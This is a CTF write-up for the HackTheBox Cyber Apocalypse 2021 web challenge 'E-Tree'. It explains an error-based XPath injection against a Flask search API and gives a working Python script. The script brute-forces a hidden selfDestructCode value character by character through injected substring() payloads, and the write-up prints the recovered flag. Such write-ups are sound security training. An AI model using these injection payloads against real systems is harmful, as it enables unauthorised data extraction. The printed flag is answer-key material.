E-Tree

Writeup for E-Tree (Web) - HackTheBox Cyber Apocalypse CTF (2021) 💜

Video Walkthrough

Challenge Description

E.Tree was a Python Flask application that used XPATH to parse XML files. We were presented with an example XML file from where we could see that some users have an additional selfDestructCode element set. Knowing this, we were able to do an error-based XPATH injection to determine the flag.

Solution

import requests
import string
from time import sleep

flag_pt1 = "CHTB{Th3_3xTr4_l3v3l_"
flag = "4Cc3s$_c0nTr0l}"
url = "http://139.59.168.47:30661/api/search"

# Each time a successful login is seen, restart loop
restart = True
count = len(flag) + 1

while restart:
    restart = False
    for char in "_" + string.ascii_letters + string.digits + "!#$%^()@{}£&*-=+.,~:;[]":
		# Update position index for the 2 seperate flag parts
        post_data = {"search": "' or substring((/military/district[position()=3]/staff[position()=2]/selfDestructCode)," + str(count) + ",1)=\"" + char + "\" or ''=' "}
        print(post_data)
        try:
            r = requests.post(url, json=post_data, headers={'Content-Type': 'application/json'})
        except BaseException:
            pass
        # Correct char results in "successful password"
        if 'exists' in r.text:
            restart = True
            count += 1
            flag += char
            print(flag)
            # Exit if "}" gives a valid redirect
            if char == "}":
                print("\nFlag: " + flag)
                exit(0)
            break

        sleep(1)

Flag: CHTB{Th3_3xTr4_l3v3l_4Cc3s$_c0nTr0l}